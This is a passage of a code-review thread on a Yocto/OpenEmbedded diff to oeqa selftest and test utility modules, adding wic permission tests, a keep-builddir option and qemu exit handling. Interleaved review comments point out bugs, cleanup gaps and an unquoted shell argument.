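Review bot: `env_script` is the last whitespace-separated token of the installer output and is still pasted unquoted into a `shell=True` command. The extraction directory now follows the host's temp location rather than a fixed `/tmp/sdk`, so I would write `runCmd(". %s; which tar" % shlex.quote(env_script), shell=True)`; this needs `shlex`, and neither that import nor `import tempfile` is visible in these hunks. The temporary `is_sdk_tar` can also become `self.assertIn(tmpdirname, result.output, "Couldn't setup SDK environment")`. The test method starts outside the hunk.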
@@ -161,6 +157,7 @@ class TestImage(OESelftestTestCase):
features += 'PACKAGE_FEED_GPG_NAME = "testuser"\n'
features += 'PACKAGE_FEED_GPG_PASSPHRASE_FILE = "%s"\n' % os.path.join(signing_key_dir, 'key.passphrase')
features += 'GPG_PATH = "%s"\n' % self.gpg_home
+ features += 'PSEUDO_IGNORE_PATHS .= ",%s"\n' % self.gpg_home
self.write_config(features)
# Build core-image-sato and testimage
@@ -178,12 +175,24 @@ class TestImage(OESelftestTestCase):
if "DISPLAY" not in os.environ:
self.skipTest("virgl gtk test must be run inside a X session")
distro = oe.lsb.distro_identifier()
+ if distro and distro.startswith('almalinux'):
+ self.skipTest('virgl isn\'t working with Alma Linux')
+ if distro and distro.startswith('rocky'):
+ self.skipTest('virgl isn\'t working with Rocky Linux')
if distro and distro == 'debian-8':
self.skipTest('virgl isn\'t working with Debian 8')
if distro and distro == 'centos-7':
self.skipTest('virgl isn\'t working with Centos 7')
+ if distro and distro == 'centos-8':
+ self.skipTest('virgl isn\'t working with Centos 8')
+ if distro and distro.startswith('fedora'):
+ self.skipTest('virgl isn\'t working with Fedora')
if distro and distro == 'opensuseleap-15.0':
self.skipTest('virgl isn\'t working with Opensuse 15.0')
+ if distro and distro == 'ubuntu-22.04':
+ self.skipTest('virgl isn\'t working with Ubuntu 22.04')
+ if distro and distro == 'ubuntu-22.10':
+ self.skipTest('virgl isn\'t working with Ubuntu 22.10')
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native')
@@ -219,6 +228,7 @@ class TestImage(OESelftestTestCase):
Author: Alexander Kanavin <alex.kanavin@gmail.com>
"""
import subprocess, os
+ self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527")
try:
content = os.listdir("/dev/dri")
if len([i for i in content if i.startswith('render')]) == 0:
@@ -226,7 +236,7 @@ class TestImage(OESelftestTestCase):
except FileNotFoundError:
self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.")
try:
- dripath = subprocess.check_output("pkg-config --variable=dridriverdir dri", shell=True)
+ dripath = subprocess.check_output("PATH=/bin:/usr/bin:$PATH pkg-config --variable=dridriverdir dri", shell=True)
except subprocess.CalledProcessError as e:
self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.")
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
diff --git a/meta/lib/oeqa/selftest/cases/sstatetests.py b/meta/lib/oeqa/selftest/cases/sstatetests.py
index c46e8ba489..1bfe88c87d 100644
--- a/meta/lib/oeqa/selftest/cases/sstatetests.py
+++ b/meta/lib/oeqa/selftest/cases/sstatetests.py
@@ -39,7 +39,7 @@ class SStateTests(SStateBase):
recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb')
os.makedirs(os.path.dirname(recipefile))
- srcuri = 'git://' + srcdir + ';protocol=file'
+ srcuri = 'git://' + srcdir + ';protocol=file;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
@@ -137,7 +137,7 @@ class SStateTests(SStateBase):
filtered_results.append(r)
self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results)))
file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
- self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+ self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
self.track_for_cleanup(self.distro_specific_sstate + "_old")
shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old")
@@ -146,13 +146,13 @@ class SStateTests(SStateBase):
bitbake(['-cclean'] + targets)
bitbake(targets)
file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
- self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+ self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2]
- self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated)))
+ self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated)))
created_once = [x for x in file_tracker_2 if x not in file_tracker_1]
- self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once)))
+ self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once)))
def test_rebuild_distro_specific_sstate_cross_native_targets(self):
self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True)
@@ -202,9 +202,9 @@ class SStateTests(SStateBase):
actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)]
actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate]
- self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected)))
+ self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected)))
expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate]
- self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual)))
+ self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual)))
def test_sstate_cache_management_script_using_pr_1(self):
global_config = []
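Review bot: The corrected message on the `expected_not_actual` assertion is still missing its `%` operator. `"Extra files were removed: %s" ', '.join(...)` is implicit literal concatenation, so the whole message becomes the join separator and the literal `%s` is never filled in. It should read `msg="Extra files were removed: %s" % ', '.join(map(str, expected_not_actual))`, matching the `actual_not_expected` assertion two lines above.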
diff --git a/meta/lib/oeqa/selftest/cases/tinfoil.py b/meta/lib/oeqa/selftest/cases/tinfoil.py
index 206168ed00..6668d7cdc8 100644
--- a/meta/lib/oeqa/selftest/cases/tinfoil.py
+++ b/meta/lib/oeqa/selftest/cases/tinfoil.py
@@ -65,6 +65,20 @@ class TinfoilTests(OESelftestTestCase):
localdata.setVar('PN', 'hello')
self.assertEqual('hello', localdata.getVar('BPN'))
+ # The config_data API tp parse_recipe_file is used by:
+ # layerindex-web layerindex/update_layer.py
+ def test_parse_recipe_custom_data(self):
+ with bb.tinfoil.Tinfoil() as tinfoil:
+ tinfoil.prepare(config_only=False, quiet=2)
+ localdata = bb.data.createCopy(tinfoil.config_data)
+ localdata.setVar("TESTVAR", "testval")
+ testrecipe = 'mdadm'
+ best = tinfoil.find_best_provider(testrecipe)
+ if not best:
+ self.fail('Unable to find recipe providing %s' % testrecipe)
+ rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
+ self.assertEqual("testval", rd.getVar('TESTVAR'))
+
def test_list_recipes(self):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=False, quiet=2)
@@ -87,36 +101,38 @@ class TinfoilTests(OESelftestTestCase):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=True)
- tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted'])
+ tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted', 'bb.command.CommandFailed', 'bb.command.CommandExit'])
# Need to drain events otherwise events that were masked may still be in the queue
while tinfoil.wait_event():
pass
pattern = 'conf'
- res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine')
+ res = tinfoil.run_command('testCookerCommandEvent', pattern, handle_events=False)
self.assertTrue(res)
eventreceived = False
commandcomplete = False
start = time.time()
- # Wait for 10s in total so we'd detect spurious heartbeat events for example
- # The test is IO load sensitive too
- while time.time() - start < 10:
+ # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example
+ while (not (eventreceived == True and commandcomplete == True)
+ and (time.time() - start < 120)):
+ # if we received both events (on let's say a good day), we are done
event = tinfoil.wait_event(1)
if event:
if isinstance(event, bb.command.CommandCompleted):
commandcomplete = True
elif isinstance(event, bb.event.FilesMatchingFound):
self.assertEqual(pattern, event._pattern)
- self.assertIn('qemuarm.conf', event._matches)
+ self.assertIn('A', event._matches)
+ self.assertIn('B', event._matches)
eventreceived = True
elif isinstance(event, logging.LogRecord):
continue
else:
self.fail('Unexpected event: %s' % event)
- self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server')
+ self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server (Matching event received: %s)' % str(eventreceived))
self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server')
def test_setvariable_clean(self):
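Review bot: `bb.command.CommandFailed` and `bb.command.CommandExit` are added to the event mask, but the loop has no branch for them, so they end in the generic `self.fail('Unexpected event: %s' % event)`; an explicit `elif isinstance(event, (bb.command.CommandFailed, bb.command.CommandExit)):` with a message naming the failed command would make that outcome easier to diagnose. The loop condition is clearer as `while not (eventreceived and commandcomplete) and time.time() - start < 120:`. The comment about detecting spurious heartbeat events no longer matches a loop that exits as soon as both events arrive.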
diff --git a/meta/lib/oeqa/selftest/cases/wic.py b/meta/lib/oeqa/selftest/cases/wic.py
index 13b6a0cc72..f7abdba015 100644
--- a/meta/lib/oeqa/selftest/cases/wic.py
+++ b/meta/lib/oeqa/selftest/cases/wic.py
@@ -62,6 +62,12 @@ def extract_files(debugfs_output):
return [line.split('/')[5].strip() for line in \
debugfs_output.strip().split('/\n')]
+def files_own_by_root(debugfs_output):
+ for line in debugfs_output.strip().split('/\n'):
+ if line.split('/')[3:5] != ['0', '0']:
+ print(debugfs_output)
+ return False
+ return True
class WicTestCase(OESelftestTestCase):
"""Wic test class."""
@@ -84,6 +90,7 @@ class WicTestCase(OESelftestTestCase):
self.skipTest('wic-tools cannot be built due its (intltool|gettext)-native dependency and NLS disable')
bitbake('core-image-minimal')
+ bitbake('core-image-minimal-mtdutils')
WicTestCase.image_is_ready = True
rmtree(self.resultdir, ignore_errors=True)
@@ -506,6 +513,105 @@ part /part2 --source rootfs --ondisk mmcblk0 --fstype=ext4 --include-path %s"""
% (wks_file, self.resultdir), ignore_status=True).status)
os.remove(wks_file)
+ def test_permissions(self):
+ """Test permissions are respected"""
+
+ # prepare wicenv and rootfs
+ bitbake('core-image-minimal core-image-minimal-mtdutils -c do_rootfs_wicenv')
+
+ oldpath = os.environ['PATH']
+ os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+ t_normal = """
+part / --source rootfs --fstype=ext4
+"""
+ t_exclude = """
+part / --source rootfs --fstype=ext4 --exclude-path=home
+"""
+ t_multi = """
+part / --source rootfs --ondisk sda --fstype=ext4
+part /export --source rootfs --rootfs=core-image-minimal-mtdutils --fstype=ext4
+"""
+ t_change = """
+part / --source rootfs --ondisk sda --fstype=ext4 --exclude-path=etc/   
+part /etc --source rootfs --fstype=ext4 --change-directory=etc
+"""
+ tests = [t_normal, t_exclude, t_multi, t_change]
+
+ try:
+ for test in tests:
+ include_path = os.path.join(self.resultdir, 'test-include')
+ os.makedirs(include_path)
+ wks_file = os.path.join(include_path, 'temp.wks')
+ with open(wks_file, 'w') as wks:
+ wks.write(test)
+ runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir))
+
+ for part in glob(os.path.join(self.resultdir, 'temp-*.direct.p*')):
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+ self.assertEqual(True, files_own_by_root(res.output))
+
+ config = 'IMAGE_FSTYPES += "wic"\nWKS_FILE = "%s"\n' % wks_file
+ self.append_config(config)
+ bitbake('core-image-minimal')
+ tmpdir = os.path.join(get_bb_var('WORKDIR', 'core-image-minimal'),'build-wic')
+
+ # check each partition for permission
+ for part in glob(os.path.join(tmpdir, 'temp-*.direct.p*')):
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+ self.assertTrue(files_own_by_root(res.output)
+ ,msg='Files permission incorrect using wks set "%s"' % test)
+
+ # clean config and result directory for next cases
+ self.remove_config(config)
+ rmtree(self.resultdir, ignore_errors=True)
+
+ finally:
+ os.environ['PATH'] = oldpath
+
+ def test_change_directory(self):
+ """Test --change-directory wks option."""
+
+ oldpath = os.environ['PATH']
+ os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+ try:
+ include_path = os.path.join(self.resultdir, 'test-include')
+ os.makedirs(include_path)
+ wks_file = os.path.join(include_path, 'temp.wks')
+ with open(wks_file, 'w') as wks:
+ wks.write("part /etc --source rootfs --fstype=ext4 --change-directory=etc")
+ runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir))
+
+ part1 = glob(os.path.join(self.resultdir, 'temp-*.direct.p1'))[0]
+
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part1))
+ files = extract_files(res.output)
+ self.assertIn('passwd', files)
+
+ finally:
+ os.environ['PATH'] = oldpath
+
+ def test_change_directory_errors(self):
+ """Test --change-directory wks option error handling."""
+ wks_file = 'temp.wks'
+
+ # Absolute argument.
+ with open(wks_file, 'w') as wks:
+ wks.write("part / --source rootfs --fstype=ext4 --change-directory /usr")
+ self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir), ignore_status=True).status)
+ os.remove(wks_file)
+
+ # Argument pointing to parent directory.
+ with open(wks_file, 'w') as wks:
+ wks.write("part / --source rootfs --fstype=ext4 --change-directory ././..")
+ self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir), ignore_status=True).status)
+ os.remove(wks_file)
+
class Wic2(WicTestCase):
def test_bmap_short(self):
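Review bot: Cleanup in the new tests is skipped when an assertion fails. In `test_permissions` the `finally` only restores `PATH`, so a failing `files_own_by_root` check leaves the appended `IMAGE_FSTYPES`/`WKS_FILE` config and the result directory in place for later tests. In `test_change_directory_errors` the `os.remove(wks_file)` after each `assertNotEqual` is never reached on failure, leaving `temp.wks` in the current directory. I would put `self.remove_config(config)` and `rmtree(self.resultdir, ignore_errors=True)` in a per-iteration `try/finally`, and do the same for `os.remove(wks_file)`; whether the base class restores the config on tearDown is not visible here.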
@@ -799,14 +905,18 @@ class Wic2(WicTestCase):
@only_for_arch(['i586', 'i686', 'x86_64'])
def test_rawcopy_plugin_qemu(self):
"""Test rawcopy plugin in qemu"""
- # build ext4 and wic images
- for fstype in ("ext4", "wic"):
- config = 'IMAGE_FSTYPES = "%s"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n' % fstype
- self.append_config(config)
- self.assertEqual(0, bitbake('core-image-minimal').status)
- self.remove_config(config)
+ # build ext4 and then use it for a wic image
+ config = 'IMAGE_FSTYPES = "ext4"\n'
+ self.append_config(config)
+ self.assertEqual(0, bitbake('core-image-minimal').status)
+ self.remove_config(config)
- with runqemu('core-image-minimal', ssh=False, image_fstype='wic') as qemu:
+ config = 'IMAGE_FSTYPES = "wic"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n'
+ self.append_config(config)
+ self.assertEqual(0, bitbake('core-image-minimal-mtdutils').status)
+ self.remove_config(config)
+
+ with runqemu('core-image-minimal-mtdutils', ssh=False, image_fstype='wic') as qemu:
cmd = "grep sda. /proc/partitions |wc -l"
status, output = qemu.run_serial(cmd)
self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output))
diff --git a/meta/lib/oeqa/selftest/context.py b/meta/lib/oeqa/selftest/context.py
index 33557b1240..be3ec6401f 100644
--- a/meta/lib/oeqa/selftest/context.py
+++ b/meta/lib/oeqa/selftest/context.py
@@ -34,7 +34,7 @@ class NonConcurrentTestSuite(unittest.TestSuite):
(builddir, newbuilddir) = self.setupfunc("-st", None, self.suite)
ret = super().run(result)
os.chdir(builddir)
- if newbuilddir and ret.wasSuccessful():
+ if newbuilddir and ret.wasSuccessful() and self.removefunc:
self.removefunc(newbuilddir)
def removebuilddir(d):
@@ -54,7 +54,7 @@ def removebuilddir(d):
bb.utils.prunedir(d, ionice=True)
class OESelftestTestContext(OETestContext):
- def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None):
+ def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None, keep_builddir=None):
super(OESelftestTestContext, self).__init__(td, logger)
self.machines = machines
@@ -62,6 +62,11 @@ class OESelftestTestContext(OETestContext):
self.config_paths = config_paths
self.newbuilddir = newbuilddir
+ if keep_builddir:
+ self.removebuilddir = None
+ else:
+ self.removebuilddir = removebuilddir
+
def setup_builddir(self, suffix, selftestdir, suite):
builddir = os.environ['BUILDDIR']
if not selftestdir:
@@ -119,9 +124,9 @@ class OESelftestTestContext(OETestContext):
if processes:
from oeqa.core.utils.concurrencytest import ConcurrentTestSuite
- return ConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+ return ConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
else:
- return NonConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+ return NonConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
def runTests(self, processes=None, machine=None, skips=[]):
if machine:
@@ -179,6 +184,9 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
action='append', default=None,
help='Exclude all (unhidden) tests that match any of the specified tag(s). (exclude applies before select)')
+ parser.add_argument('-K', '--keep-builddir', action='store_true',
+ help='Keep the test build directory even if all tests pass')
+
parser.add_argument('-B', '--newbuilddir', help='New build directory to use for tests.')
parser.set_defaults(func=self.run)
@@ -235,6 +243,7 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
self.tc_kwargs['init']['config_paths']['localconf'] = os.path.join(builddir, "conf/local.conf")
self.tc_kwargs['init']['config_paths']['bblayers'] = os.path.join(builddir, "conf/bblayers.conf")
self.tc_kwargs['init']['newbuilddir'] = args.newbuilddir
+ self.tc_kwargs['init']['keep_builddir'] = args.keep_builddir
def tag_filter(tags):
if args.exclude_tags:
diff --git a/meta/lib/oeqa/utils/buildproject.py b/meta/lib/oeqa/utils/buildproject.py
index e6d80cc8dc..dfb9661868 100644
--- a/meta/lib/oeqa/utils/buildproject.py
+++ b/meta/lib/oeqa/utils/buildproject.py
@@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta):
def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None):
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-')
tmpdir = self.tempdirobj.name
@@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
if not self.needclean:
return
self._run('rm -rf %s' % self.targetdir)
diff --git a/meta/lib/oeqa/utils/commands.py b/meta/lib/oeqa/utils/commands.py
index 8059cbce3e..024261410e 100644
--- a/meta/lib/oeqa/utils/commands.py
+++ b/meta/lib/oeqa/utils/commands.py
@@ -125,11 +125,11 @@ class Command(object):
def stop(self):
for thread in self.threads:
- if thread.isAlive():
+ if thread.is_alive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
thread.join(5)
- if thread.isAlive():
+ if thread.is_alive():
self.process.kill()
thread.join()
@@ -174,11 +174,8 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
if native_sysroot:
extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
(native_sysroot, native_sysroot, native_sysroot)
- extra_libpaths = "%s/lib:%s/usr/lib" % \
- (native_sysroot, native_sysroot)
nenv = dict(options.get('env', os.environ))
nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
- nenv['LD_LIBRARY_PATH'] = extra_libpaths + ':' + nenv.get('LD_LIBRARY_PATH', '')
options['env'] = nenv
cmd = Command(command, timeout=timeout, output_log=output_log, **options)
@@ -188,7 +185,10 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
# call sync around the tests to ensure the IO queue doesn't get too large, taking any IO
# hit here rather than in bitbake shutdown.
if sync:
+ p = os.environ['PATH']
+ os.environ['PATH'] = "/usr/bin:/bin:/usr/sbin:/sbin:" + p
os.system("sync")
+ os.environ['PATH'] = p
result.command = command
result.status = cmd.status
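Review bot: The PATH swap around `os.system("sync")` rewrites the process-wide environment, so other threads see the altered value while it is in place. `os.environ['PATH']` also raises `KeyError` when PATH is unset, whereas the native_sysroot branch earlier in this function uses `.get('PATH', '')`. If the aim is to run the host's sync rather than one found earlier in PATH, `os.sync()` does that with no shell and no PATH lookup, and replaces all four lines. runCmd starts outside the hunk.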
diff --git a/meta/lib/oeqa/utils/metadata.py b/meta/lib/oeqa/utils/metadata.py
index 8013aa684d..15ec190c4a 100644
--- a/meta/lib/oeqa/utils/metadata.py
+++ b/meta/lib/oeqa/utils/metadata.py
@@ -27,9 +27,9 @@ def metadata_from_bb():
data_dict = get_bb_vars()
# Distro information
- info_dict['distro'] = {'id': data_dict['DISTRO'],
- 'version_id': data_dict['DISTRO_VERSION'],
- 'pretty_name': '%s %s' % (data_dict['DISTRO'], data_dict['DISTRO_VERSION'])}
+ info_dict['distro'] = {'id': data_dict.get('DISTRO', 'NODISTRO'),
+ 'version_id': data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'),
+ 'pretty_name': '%s %s' % (data_dict.get('DISTRO', 'NODISTRO'), data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'))}
# Host distro information
os_release = get_os_release()
diff --git a/meta/lib/oeqa/utils/nfs.py b/meta/lib/oeqa/utils/nfs.py
index a37686c914..c9bac050a4 100644
--- a/meta/lib/oeqa/utils/nfs.py
+++ b/meta/lib/oeqa/utils/nfs.py
@@ -8,7 +8,7 @@ from oeqa.utils.commands import bitbake, get_bb_var, Command
from oeqa.utils.network import get_free_port
@contextlib.contextmanager
-def unfs_server(directory, logger = None):
+def unfs_server(directory, logger = None, udp = True):
unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native")
if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")):
# build native tool
@@ -22,7 +22,7 @@ def unfs_server(directory, logger = None):
exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode())
# find some ports for the server
- nfsport, mountport = get_free_port(udp = True), get_free_port(udp = True)
+ nfsport, mountport = get_free_port(udp), get_free_port(udp)
nenv = dict(os.environ)
nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '')
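Review bot: `get_free_port(udp)` passes the flag positionally where the removed line used the keyword, so the call now depends on `udp` being the first parameter of `get_free_port`, which is not visible here; `get_free_port(udp = udp)` keeps the earlier form. The `udp` parameter added to the `unfs_server` signature in the previous hunk is undocumented, and a one-line comment on what `udp = False` selects would help callers. The export line above grants `rw,no_root_squash,no_all_squash,insecure` with no client restriction, so it is worth confirming outside this hunk that unfsd is reachable only from the test host for either transport.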
diff --git a/meta/lib/oeqa/utils/qemurunner.py b/meta/lib/oeqa/utils/qemurunner.py
index 77ec939ad7..c84d299a80 100644
--- a/meta/lib/oeqa/utils/qemurunner.py
+++ b/meta/lib/oeqa/utils/qemurunner.py
@@ -70,6 +70,8 @@ class QemuRunner:
self.monitorpipe = None
self.logger = logger
+ # Whether we're expecting an exit and should show related errors
+ self.canexit = False
# Enable testing other OS's
# Set commands for target communication, and default to Linux ALWAYS
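Review bot: The comment on `self.canexit` says the flag decides whether to "show related errors", but the later hunks of this file use it to suppress them: when it is true the serial read returns `(1, "")` and the logging thread returns `b''` instead of raising. A wording such as `# Set by allowexit() once the target is expected to exit; a closed console is then not treated as an error` matches that use. The two `allowexit()` methods added further down have no docstring, and one line each stating that they only set this flag would be enough.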
@@ -118,7 +120,10 @@ class QemuRunner:
import fcntl
fl = fcntl.fcntl(o, fcntl.F_GETFL)
fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK)
- return os.read(o.fileno(), 1000000).decode("utf-8")
+ try:
+ return os.read(o.fileno(), 1000000).decode("utf-8")
+ except BlockingIOError:
+ return ""
def handleSIGCHLD(self, signum, frame):
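Review bot: `os.read(o.fileno(), 1000000).decode("utf-8")` can still raise `UnicodeDecodeError` when the process output is not valid UTF-8 or the read ends inside a multi-byte sequence, and the new `except BlockingIOError` does not cover that. The stop path later in this diff only logs the result, so `.decode("utf-8", errors="replace")` would keep diagnostic output flowing instead of failing while an error is being reported. The function starts outside the hunk.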
@@ -229,7 +234,7 @@ class QemuRunner:
r = os.fdopen(r)
x = r.read()
os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM)
- sys.exit(0)
+ os._exit(0)
self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid)
self.logger.debug("waiting at most %s seconds for qemu pid (%s)" %
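Review bot: The switch from `sys.exit(0)` to `os._exit(0)` carries no comment explaining why the normal exit path is avoided. If this branch runs in a forked child, as the pipe read and `os.killpg` around it suggest, a line such as `# forked watcher: leave without raising SystemExit or running the parent's exit handlers` would stop the call being changed back later. The enclosing method starts and ends outside the hunk.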
@@ -427,12 +432,17 @@ class QemuRunner:
except OSError as e:
if e.errno != errno.ESRCH:
raise
- endtime = time.time() + self.runqemutime
- while self.runqemu.poll() is None and time.time() < endtime:
- time.sleep(1)
- if self.runqemu.poll() is None:
+ try:
+ outs, errs = self.runqemu.communicate(timeout = self.runqemutime)
+ if outs:
+ self.logger.info("Output from runqemu:\n%s", outs.decode("utf-8"))
+ if errs:
+ self.logger.info("Stderr from runqemu:\n%s", errs.decode("utf-8"))
+ except TimeoutExpired:
self.logger.debug("Sending SIGKILL to runqemu")
os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL)
+ if not self.runqemu.stdout.closed:
+ self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout))
self.runqemu.stdin.close()
self.runqemu.stdout.close()
self.runqemu_exited = True
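Review bot: After `except TimeoutExpired:` the process group is sent SIGKILL but the child is never waited on again, so it is not reaped here and anything left on stderr is dropped; only stdout is read afterwards through `getOutput`. The subprocess documentation's pattern is to kill and then call `communicate()` once more, ideally with a timeout so that a descendant still holding the pipe cannot block the teardown. `TimeoutExpired` is used as a bare name, so it has to be imported from `subprocess` somewhere outside this hunk. `outs.decode("utf-8")` and `errs.decode("utf-8")` would also be safer with `errors="replace"`, since this is log output.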
@@ -467,6 +477,11 @@ class QemuRunner:
self.thread.stop()
self.thread.join()
+ def allowexit(self):
+ self.canexit = True
+ if self.thread:
+ self.thread.allowexit()
+
def restart(self, qemuparams = None):
self.logger.warning("Restarting qemu process")
if self.runqemu.poll() is None:
@@ -522,7 +537,9 @@ class QemuRunner:
if re.search(self.boot_patterns['search_cmd_finished'], data):
break
else:
- raise Exception("No data on serial console socket")
+ if self.canexit:
+ return (1, "")
+ raise Exception("No data on serial console socket, connection closed?")
if data:
if raw:
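Review bot: The new `return (1, "")` hands callers a status and empty output with no comment saying what status 1 means on this path. As far as this hunk shows, a console that closed during an expected exit is then reported the same way as a command that produced no output. A comment such as `# allowexit() was called: a closed console is expected, return an empty result instead of raising` would record the intent. The method starts and ends outside the hunk.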
@@ -560,6 +577,7 @@ class LoggingThread(threading.Thread):
self.logger = logger
self.readsock = None
self.running = False
+ self.canexit = False
self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL
self.readevents = select.POLLIN | select.POLLPRI
@@ -593,6 +611,9 @@ class LoggingThread(threading.Thread):
self.close_ignore_error(self.writepipe)
self.running = False
+ def allowexit(self):
+ self.canexit = True
+
def eventloop(self):
poll = select.poll()
event_read_mask = self.errorevents | self.readevents
@@ -638,7 +659,7 @@ class LoggingThread(threading.Thread):
data = self.readsock.recv(count)
except socket.error as e:
if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK:
- return ''
+ return b''
else:
raise
@@ -649,7 +670,9 @@ class LoggingThread(threading.Thread):
# happened. But for this code it counts as an
# error since the connection shouldn't go away
# until qemu exits.
- raise Exception("Console connection closed unexpectedly")
+ if not self.canexit:
+ raise Exception("Console connection closed unexpectedly")
+ return b''
return data
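Review bot: The comment kept above the new `if not self.canexit:` still says a closed connection "counts as an error since the connection shouldn't go away until qemu exits", which is no longer true once `allowexit()` has been called. It should gain a sentence such as `# ...unless allowexit() announced the exit, in which case an empty read is returned`. The `b''` returned here is also the same value as the EAGAIN path in the previous hunk, so the caller cannot tell "no data yet" from "peer closed". Whether the event loop then keeps polling the closed socket is outside this hunk and worth checking.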
diff --git a/meta/lib/oeqa/utils/targetbuild.py b/meta/lib/oeqa/utils/targetbuild.py
index 1055810ca3..09738add1d 100644
--- a/meta/lib/oeqa/utils/targetbuild.py
